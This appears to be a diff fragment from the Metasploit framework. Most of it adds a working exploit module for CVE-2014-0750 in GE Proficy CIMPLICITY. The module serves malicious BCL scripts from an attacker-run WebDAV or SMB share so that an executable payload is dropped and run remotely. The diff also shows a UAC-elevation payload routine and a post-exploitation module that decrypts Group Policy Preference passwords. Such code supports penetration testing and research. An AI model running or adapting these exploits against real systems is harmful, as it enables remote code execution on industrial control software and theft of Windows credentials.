|
|
||||||
|
|
||||||
file_rm(delete_file)
|
|
||||||
end
|
end
|
||||||
|
|
||||||
|
def runas_method
|
||||||
|
payload = generate_payload_exe
|
||||||
|
payload_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
|
||||||
|
tmpdir = expand_path("%TEMP%")
|
||||||
|
tempexe = tmpdir + "\\" + payload_filename
|
||||||
|
write_file(tempexe, payload)
|
||||||
|
print_status("Uploading payload: #{tempexe}")
|
||||||
|
session.railgun.shell32.ShellExecuteA(nil,"runas",tempexe,nil,nil,5)
|
||||||
|
print_status("Payload executed")
|
||||||
|
end
|
||||||
|
|
||||||
|
def validate_environment!
|
||||||
|
fail_with(Exploit::Failure::None, 'Already in elevated state') if is_admin? or is_system?
|
||||||
|
#
|
||||||
|
# Verify use against Vista+
|
||||||
|
#
|
||||||
|
winver = sysinfo["OS"]
|
||||||
|
|
||||||
|
unless winver =~ /Windows Vista|Windows 2008|Windows [78]/
|
||||||
|
fail_with(Exploit::Failure::NotVulnerable, "#{winver} is not vulnerable.")
|
||||||
|
end
|
||||||
|
|
||||||
|
if is_uac_enabled?
|
||||||
|
print_status "UAC is Enabled, checking level..."
|
||||||
|
else
|
||||||
|
if is_in_admin_group?
|
||||||
|
fail_with(Exploit::Failure::Unknown, "UAC is disabled and we are in the admin group so something has gone wrong...")
|
||||||
|
else
|
||||||
|
fail_with(Exploit::Failure::NoAccess, "Not in admins group, cannot escalate with this module")
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
@ -0,0 +1,315 @@
|
||||||
|
##
|
||||||
|
# This module requires Metasploit: http//metasploit.com/download
|
||||||
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
|
##
|
||||||
|
|
||||||
|
require 'msf/core'
|
||||||
|
|
||||||
|
class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
Rank = ExcellentRanking
|
||||||
|
|
||||||
|
include Msf::Auxiliary::Report
|
||||||
|
include Msf::Exploit::EXE
|
||||||
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
include Msf::Exploit::Remote::HttpServer::HTML
|
||||||
|
|
||||||
|
def initialize
|
||||||
|
super(
|
||||||
|
'Name' => 'GE Proficy CIMPLICITY gefebt.exe Remote Code Execution',
|
||||||
|
'Description' => %q{
|
||||||
|
This module abuses the gefebt.exe component in GE Proficy CIMPLICITY, reachable through the
|
||||||
|
CIMPLICIY CimWebServer. The vulnerable component allows to execute remote BCL files in
|
||||||
|
shared resources. An attacker can abuse this behaviour to execute a malicious BCL and
|
||||||
|
drop an arbitrary EXE. The last one can be executed remotely through the WebView server.
|
||||||
|
This module has been tested successfully in GE Proficy CIMPLICITY 7.5 with the embedded
|
||||||
|
CimWebServer. This module starts a WebDAV server to provide the malicious BCL files. When
|
||||||
|
the target hasn't the WebClient service enabled, an external SMB service is necessary.
|
||||||
|
},
|
||||||
|
'Author' => [
|
||||||
|
'amisto0x07', # Vulnerability discovery
|
||||||
|
'Z0mb1E', # Vulnerability discovery
|
||||||
|
'juan vazquez' # Metasploit module
|
||||||
|
],
|
||||||
|
'References' =>
|
||||||
|
[
|
||||||
|
[ 'CVE', '2014-0750'],
|
||||||
|
[ 'ZDI', '14-015' ],
|
||||||
|
[ 'URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-14-023-01' ]
|
||||||
|
],
|
||||||
|
'Stance' => Msf::Exploit::Stance::Aggressive,
|
||||||
|
'Platform' => 'win',
|
||||||
|
'Targets' =>
|
||||||
|
[
|
||||||
|
[ 'GE Proficy CIMPLICITY 7.5 (embedded CimWebServer)', { } ]
|
||||||
|
],
|
||||||
|
'DefaultTarget' => 0,
|
||||||
|
'Privileged' => true,
|
||||||
|
'DisclosureDate' => 'Jan 23 2014'
|
||||||
|
)
|
||||||
|
register_options(
|
||||||
|
[
|
||||||
|
Opt::RPORT(80),
|
||||||
|
OptString.new('URIPATH', [ true, 'The URI to use (do not change)', '/' ]),
|
||||||
|
OptPort.new('SRVPORT', [ true, 'The daemon port to listen on (do not change)', 80 ]),
|
||||||
|
OptString.new('UNCPATH', [ false, 'Override the UNC path to use.' ]),
|
||||||
|
OptBool.new('ONLYMAKE', [ false, 'Just generate the malicious BCL files for using with an external SMB server.', true ]),
|
||||||
|
OptString.new('TARGETURI', [true, 'The base path to the CimWeb', '/'])
|
||||||
|
], self.class)
|
||||||
|
end
|
||||||
|
|
||||||
|
def on_request_uri(cli, request)
|
||||||
|
case request.method
|
||||||
|
when 'OPTIONS'
|
||||||
|
process_options(cli, request)
|
||||||
|
when 'PROPFIND'
|
||||||
|
process_propfind(cli, request)
|
||||||
|
when 'GET'
|
||||||
|
process_get(cli, request)
|
||||||
|
else
|
||||||
|
vprint_status("#{request.method} => 404 (#{request.uri})")
|
||||||
|
resp = create_response(404, "Not Found")
|
||||||
|
resp.body = ""
|
||||||
|
resp['Content-Type'] = 'text/html'
|
||||||
|
cli.send_response(resp)
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
def process_get(cli, request)
|
||||||
|
if request.uri =~ /#{@basename}(\d)\.bcl/
|
||||||
|
print_status("GET => Payload")
|
||||||
|
data = @bcls[$1.to_i]
|
||||||
|
send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
|
# Anything else is probably a request for a data file...
|
||||||
|
vprint_status("GET => DATA (#{request.uri})")
|
||||||
|
data = rand_text_alpha(8 + rand(10))
|
||||||
|
send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
|
||||||
|
end
|
||||||
|
|
||||||
|
#
|
||||||
|
# OPTIONS requests sent by the WebDav Mini-Redirector
|
||||||
|
#
|
||||||
|
def process_options(cli, request)
|
||||||
|
vprint_status("OPTIONS #{request.uri}")
|
||||||
|
headers = {
|
||||||
|
'MS-Author-Via' => 'DAV',
|
||||||
|
'DASL' => '<DAV:sql>',
|
||||||
|
'DAV' => '1, 2',
|
||||||
|
'Allow' => 'OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH',
|
||||||
|
'Public' => 'OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK',
|
||||||
|
'Cache-Control' => 'private'
|
||||||
|
}
|
||||||
|
resp = create_response(207, "Multi-Status")
|
||||||
|
headers.each_pair {|k,v| resp[k] = v }
|
||||||
|
resp.body = ""
|
||||||
|
resp['Content-Type'] = 'text/xml'
|
||||||
|
cli.send_response(resp)
|
||||||
|
end
|
||||||
|
|
||||||
|
#
|
||||||
|
# PROPFIND requests sent by the WebDav Mini-Redirector
|
||||||
|
#
|
||||||
|
def process_propfind(cli, request)
|
||||||
|
path = request.uri
|
||||||
|
print_status("Received WebDAV PROPFIND request")
|
||||||
|
body = ''
|
||||||
|
|
||||||
|
if (path =~ /\.bcl$/i)
|
||||||
|
print_status("Sending BCL multistatus for #{path} ...")
|
||||||
|
body = %Q|<?xml version="1.0"?>
|
||||||
|
<a:multistatus xmlns:b="urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/" xmlns:c="xml:" xmlns:a="DAV:">
|
||||||
|
<a:response>
|
||||||
|
</a:response>
|
||||||
|
</a:multistatus>
|
||||||
|
|
|
||||||
|
elsif (path =~ /\/$/) or (not path.sub('/', '').index('/'))
|
||||||
|
# Response for anything else (generally just /)
|
||||||
|
print_status("Sending directory multistatus for #{path} ...")
|
||||||
|
body = %Q|<?xml version="1.0" encoding="utf-8"?>
|
||||||
|
<D:multistatus xmlns:D="DAV:">
|
||||||
|
<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
|
||||||
|
<D:href>#{path}</D:href>
|
||||||
|
<D:propstat>
|
||||||
|
<D:prop>
|
||||||
|
<lp1:resourcetype><D:collection/></lp1:resourcetype>
|
||||||
|
<lp1:creationdate>2010-02-26T17:07:12Z</lp1:creationdate>
|
||||||
|
<lp1:getlastmodified>Fri, 26 Feb 2010 17:07:12 GMT</lp1:getlastmodified>
|
||||||
|
<lp1:getetag>"39e0001-1000-4808c3ec95000"</lp1:getetag>
|
||||||
|
<D:lockdiscovery/>
|
||||||
|
<D:getcontenttype>httpd/unix-directory</D:getcontenttype>
|
||||||
|
</D:prop>
|
||||||
|
<D:status>HTTP/1.1 200 OK</D:status>
|
||||||
|
</D:propstat>
|
||||||
|
</D:response>
|
||||||
|
</D:multistatus>
|
||||||
|
|
|
||||||
|
else
|
||||||
|
print_status("Sending 404 for #{path} ...")
|
||||||
|
send_not_found(cli)
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
|
# send the response
|
||||||
|
resp = create_response(207, "Multi-Status")
|
||||||
|
resp.body = body
|
||||||
|
resp['Content-Type'] = 'text/xml'
|
||||||
|
cli.send_response(resp)
|
||||||
|
end
|
||||||
|
|
||||||
|
def check
|
||||||
|
uri = normalize_uri(target_uri.to_s, "CimWeb", "gefebt.exe")
|
||||||
|
uri << "?"
|
||||||
|
|
||||||
|
res = send_request_cgi('uri' => uri)
|
||||||
|
|
||||||
|
# res.to_s is used because the CIMPLICITY embedded web server
|
||||||
|
# doesn't send HTTP compatible responses.
|
||||||
|
if res and res.code == 200 and res.to_s =~ /Usage.*gefebt\.exe/
|
||||||
|
return Exploit::CheckCode::Detected
|
||||||
|
end
|
||||||
|
|
||||||
|
Exploit::CheckCode::Unknown
|
||||||
|
end
|
||||||
|
|
||||||
|
def exploit
|
||||||
|
@extensions = "bcl"
|
||||||
|
@bcls= []
|
||||||
|
@total_exe = 0
|
||||||
|
|
||||||
|
setup_resources
|
||||||
|
|
||||||
|
make_bcls
|
||||||
|
|
||||||
|
print_status("BCL's available at #{@exploit_unc}#{@share_name}\\#{@basename}{i}.bcl")
|
||||||
|
|
||||||
|
unless datastore['UNCPATH'].blank?
|
||||||
|
@bcls.each_index { |i| file_create("#{@basename}#{i}.bcl", @bcls[i]) }
|
||||||
|
if datastore['ONLYMAKE']
|
||||||
|
print_warning("Files created, remember to upload the BCL files to the remote share!")
|
||||||
|
print_warning("Once ready set ONLYMAKE to false")
|
||||||
|
else
|
||||||
|
exploit_bcl
|
||||||
|
end
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
|
super
|
||||||
|
end
|
||||||
|
|
||||||
|
def setup_resources
|
||||||
|
if datastore['UNCPATH'].blank?
|
||||||
|
# Using WebDAV
|
||||||
|
my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST']
|
||||||
|
@basename = rand_text_alpha(3)
|
||||||
|
@share_name = rand_text_alpha(3)
|
||||||
|
@exploit_unc = "\\\\#{my_host}\\"
|
||||||
|
@exe_filename = "#{rand_text_alpha(3 + rand(4))}.exe"
|
||||||
|
unless datastore['SRVPORT'].to_i == 80 && datastore['URIPATH'] == '/'
|
||||||
|
fail_with(Failure::BadConfig, 'Using WebDAV requires SRVPORT=80 and URIPATH=/')
|
||||||
|
end
|
||||||
|
else
|
||||||
|
# Using external SMB Server
|
||||||
|
if datastore['UNCPATH'] =~ /(\\\\[^\\]*\\)([^\\]*)\\([^\\]*)\.bcl/
|
||||||
|
@exploit_unc = $1
|
||||||
|
@share_name = $2
|
||||||
|
@basename = $3
|
||||||
|
# Use an static file name for the EXE since the module doesn't
|
||||||
|
# deliver the BCL files in this case.
|
||||||
|
@exe_filename = "ge_pld.exe"
|
||||||
|
else
|
||||||
|
fail_with(Failure::BadConfig, 'Bad UNCPATH format, should be \\\\host\\shared_folder\\base_name.blc')
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
def make_bcls
|
||||||
|
exe = generate_payload_exe
|
||||||
|
# Padding to be sure we're aligned to 4 bytes.
|
||||||
|
exe << "\x00" until exe.length % 4 == 0
|
||||||
|
longs = exe.unpack("l*")
|
||||||
|
offset = 0
|
||||||
|
|
||||||
|
# gefebt.exe isn't able to handle (on my test environment) long
|
||||||
|
# arrays bigger than 16000, so we need to split it.
|
||||||
|
while longs.length > 0
|
||||||
|
parts = longs.slice!(0, 16000)
|
||||||
|
@bcls << generate_bcl(parts , offset)
|
||||||
|
offset += parts.length * 4
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
def generate_bcl(slices, offset)
|
||||||
|
bcl_payload = ""
|
||||||
|
|
||||||
|
slices.each_index do |i|
|
||||||
|
bcl_payload << "s(#{i + 1}) = #{slices[i]}\n"
|
||||||
|
end
|
||||||
|
|
||||||
|
<<-EOF
|
||||||
|
Option CStrings On
|
||||||
|
|
||||||
|
Sub Main()
|
||||||
|
Open "#{@exe_filename}" For Binary Access Write As #1
|
||||||
|
Dim s(#{slices.length}) As Long
|
||||||
|
#{bcl_payload}
|
||||||
|
|
||||||
|
For x = 1 To #{slices.length}
|
||||||
|
t = x - 1
|
||||||
|
Put #1,t*4+1+#{offset},s(x)
|
||||||
|
Next x
|
||||||
|
|
||||||
|
Close
|
||||||
|
End Sub
|
||||||
|
EOF
|
||||||
|
end
|
||||||
|
|
||||||
|
def execute_bcl(i)
|
||||||
|
print_status("#{peer} - Executing BCL code #{@basename}#{i}.bcl to drop final payload...")
|
||||||
|
|
||||||
|
uri = normalize_uri(target_uri.to_s, "CimWeb", "gefebt.exe")
|
||||||
|
uri << "?#{@exploit_unc}#{@share_name}\\#{@basename}#{i}.bcl"
|
||||||
|
|
||||||
|
res = send_request_cgi('uri' => uri)
|
||||||
|
|
||||||
|
# We use res.to_s because the embedded CIMPLICITY Web server doesn't
|
||||||
|
# answer with valid HTTP responses.
|
||||||
|
if res and res.code == 200 and res.to_s =~ /(^Error.*$)/
|
||||||
|
print_error("#{peer} - Server answered with error: $1")
|
||||||
|
fail_with(Failure::Unknown, "#{peer} - Server answered with error")
|
||||||
|
elsif res and res.code == 200 and res.to_s =~ /No such file or directory/
|
||||||
|
fail_with(Failure::BadConfig, "#{peer} - The target wasn't able to access the remote BCL file")
|
||||||
|
elsif res and res.code == 200
|
||||||
|
print_good("#{peer} - Answer has been successful")
|
||||||
|
else
|
||||||
|
fail_with(Failure::Unknown, "#{peer} - Unknown error")
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
def exploit_bcl
|
||||||
|
@bcls.each_index do |i|
|
||||||
|
execute_bcl(i)
|
||||||
|
end
|
||||||
|
|
||||||
|
print_status("#{peer} - Executing #{@exe_filename}...")
|
||||||
|
uri = normalize_uri(target_uri.to_s, "CimWeb", @exe_filename)
|
||||||
|
uri << "?"
|
||||||
|
|
||||||
|
# Enough timeout to execute the payload, but don't block the exploit
|
||||||
|
# until there is an answer.
|
||||||
|
send_request_cgi({'uri' => uri}, 3)
|
||||||
|
end
|
||||||
|
|
||||||
|
def primer
|
||||||
|
exploit_bcl
|
||||||
|
service.stop
|
||||||
|
end
|
||||||
|
|
||||||
|
def file_create(fname, data)
|
||||||
|
ltype = "exploit.fileformat.#{self.shortname}"
|
||||||
|
full_path = store_local(ltype, nil, data, fname)
|
||||||
|
print_good("#{fname} stored at #{full_path}")
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
|
@ -43,6 +43,7 @@ module Metasploit3
|
||||||
|
|
||||||
def generate_jar(opts={})
|
def generate_jar(opts={})
|
||||||
jar = Rex::Zip::Jar.new
|
jar = Rex::Zip::Jar.new
|
||||||
|
jar.add_sub("metasploit") if opts[:random]
|
||||||
@class_files.each do |path|
|
@class_files.each do |path|
|
||||||
1.upto(path.length - 1) do |idx|
|
1.upto(path.length - 1) do |idx|
|
||||||
full = path[0,idx].join("/") + "/"
|
full = path[0,idx].join("/") + "/"
|
||||||
|
|
|
@ -10,6 +10,7 @@ require 'msf/core/auxiliary/report'
|
||||||
|
|
||||||
class Metasploit3 < Msf::Post
|
class Metasploit3 < Msf::Post
|
||||||
include Msf::Auxiliary::Report
|
include Msf::Auxiliary::Report
|
||||||
|
include Msf::Post::File
|
||||||
include Msf::Post::Windows::Priv
|
include Msf::Post::Windows::Priv
|
||||||
include Msf::Post::Windows::Registry
|
include Msf::Post::Windows::Registry
|
||||||
|
|
||||||
|
@ -22,6 +23,9 @@ class Metasploit3 < Msf::Post
|
||||||
files containing local user accounts and passwords and decrypts them
|
files containing local user accounts and passwords and decrypts them
|
||||||
using Microsofts public AES key.
|
using Microsofts public AES key.
|
||||||
|
|
||||||
|
Cached Group Policy files may be found on end-user devices if the group
|
||||||
|
policy object is deleted rather than unlinked.
|
||||||
|
|
||||||
Tested on WinXP SP3 Client and Win2k8 R2 DC.
|
Tested on WinXP SP3 Client and Win2k8 R2 DC.
|
||||||
},
|
},
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
|
@ -34,10 +38,10 @@ class Metasploit3 < Msf::Post
|
||||||
],
|
],
|
||||||
'References' =>
|
'References' =>
|
||||||
[
|
[
|
||||||
['URL', 'http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences'],
|
|
||||||
['URL', 'http://msdn.microsoft.com/en-us/library/cc232604(v=prot.13)'],
|
['URL', 'http://msdn.microsoft.com/en-us/library/cc232604(v=prot.13)'],
|
||||||
['URL', 'http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html'],
|
['URL', 'http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html'],
|
||||||
['URL', 'http://blogs.technet.com/grouppolicy/archive/2009/04/22/passwords-in-group-policy-preferences-updated.aspx']
|
['URL', 'http://blogs.technet.com/grouppolicy/archive/2009/04/22/passwords-in-group-policy-preferences-updated.aspx'],
|
||||||
|
['URL', 'https://labs.portcullis.co.uk/blog/are-you-considering-using-microsoft-group-policy-preferences-think-again/']
|
||||||
],
|
],
|
||||||
'Platform' => [ 'win' ],
|
'Platform' => [ 'win' ],
|
||||||
'SessionTypes' => [ 'meterpreter' ]
|
'SessionTypes' => [ 'meterpreter' ]
|
||||||
|
@ -65,11 +69,30 @@ class Metasploit3 < Msf::Post
|
||||||
fullpaths = []
|
fullpaths = []
|
||||||
cached_domain_controller = nil
|
cached_domain_controller = nil
|
||||||
|
|
||||||
print_status "Checking locally..."
|
print_status "Checking for group policy history objects..."
|
||||||
locals = get_basepaths(client.fs.file.expand_path("%SYSTEMROOT%\\SYSVOL\\sysvol"))
|
# Windows XP environment variable points to the correct folder.
|
||||||
|
# Windows Vista and upwards points to ProgramData!
|
||||||
|
all_users = expand_path("%ALLUSERSPROFILE%")
|
||||||
|
|
||||||
|
if all_users.include? 'ProgramData'
|
||||||
|
all_users.gsub!('ProgramData','Users\\All Users')
|
||||||
|
else
|
||||||
|
all_users = "#{all_users}\\Application Data"
|
||||||
|
end
|
||||||
|
|
||||||
|
cached = get_basepaths("#{all_users}\\Microsoft\\Group Policy\\History", true)
|
||||||
|
|
||||||
|
unless cached.blank?
|
||||||
|
basepaths << cached
|
||||||
|
print_good "Cached Group Policy folder found locally"
|
||||||
|
end
|
||||||
|
|
||||||
|
print_status "Checking for SYSVOL locally..."
|
||||||
|
system_root = expand_path("%SYSTEMROOT%")
|
||||||
|
locals = get_basepaths("#{system_root}\\SYSVOL\\sysvol")
|
||||||
unless locals.blank?
|
unless locals.blank?
|
||||||
basepaths << locals
|
basepaths << locals
|
||||||
print_good "Group Policy Files found locally"
|
print_good "SYSVOL Group Policy Files found locally"
|
||||||
end
|
end
|
||||||
|
|
||||||
# If user supplied domains this implicitly cancels the ALL flag.
|
# If user supplied domains this implicitly cancels the ALL flag.
|
||||||
|
@ -153,19 +176,27 @@ class Metasploit3 < Msf::Post
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
def get_basepaths(base)
|
def get_basepaths(base, cached=false)
|
||||||
locals = []
|
locals = []
|
||||||
begin
|
begin
|
||||||
session.fs.dir.foreach(base) do |sub|
|
session.fs.dir.foreach(base) do |sub|
|
||||||
next if sub =~ /^(\.|\.\.)$/
|
next if sub =~ /^(\.|\.\.)$/
|
||||||
tpath = "#{base}\\#{sub}\\Policies"
|
|
||||||
begin
|
# Local GPO are stored in C:\Users\All Users\Microsoft\Group
|
||||||
session.fs.dir.foreach(tpath) do |sub2|
|
# Policy\History\{GUID}\Machine\etc without \Policies
|
||||||
next if sub =~ /^(\.|\.\.)$/
|
if cached
|
||||||
locals << "#{tpath}\\#{sub2}\\"
|
locals << "#{base}\\#{sub}\\"
|
||||||
|
else
|
||||||
|
tpath = "#{base}\\#{sub}\\Policies"
|
||||||
|
|
||||||
|
begin
|
||||||
|
session.fs.dir.foreach(tpath) do |sub2|
|
||||||
|
next if sub2 =~ /^(\.|\.\.)$/
|
||||||
|
locals << "#{tpath}\\#{sub2}\\"
|
||||||
|
end
|
||||||
|
rescue Rex::Post::Meterpreter::RequestError => e
|
||||||
|
print_error "Could not access #{tpath} : #{e.message}"
|
||||||
end
|
end
|
||||||
rescue Rex::Post::Meterpreter::RequestError => e
|
|
||||||
print_error "Could not access #{tpath} : #{e.message}"
|
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
rescue Rex::Post::Meterpreter::RequestError => e
|
rescue Rex::Post::Meterpreter::RequestError => e
|
||||||
|
@ -177,7 +208,7 @@ class Metasploit3 < Msf::Post
|
||||||
def find_path(path, xml_path)
|
def find_path(path, xml_path)
|
||||||
xml_path = "#{path}#{xml_path}"
|
xml_path = "#{path}#{xml_path}"
|
||||||
begin
|
begin
|
||||||
return xml_path if client.fs.file.stat(xml_path)
|
return xml_path if exist? xml_path
|
||||||
rescue Rex::Post::Meterpreter::RequestError => e
|
rescue Rex::Post::Meterpreter::RequestError => e
|
||||||
# No permissions for this specific file.
|
# No permissions for this specific file.
|
||||||
return nil
|
return nil
|
||||||
|
@ -186,10 +217,7 @@ class Metasploit3 < Msf::Post
|
||||||
|
|
||||||
def gpp_xml_file(path)
|
def gpp_xml_file(path)
|
||||||
begin
|
begin
|
||||||
groups = client.fs.file.new(path,'r')
|
data = read_file(path)
|
||||||
until groups.eof
|
|
||||||
data = groups.read
|
|
||||||
end
|
|
||||||
|
|
||||||
spath = path.split('\\')
|
spath = path.split('\\')
|
||||||
retobj = {
|
retobj = {
|
||||||
|
|
Loading…
Reference in New Issue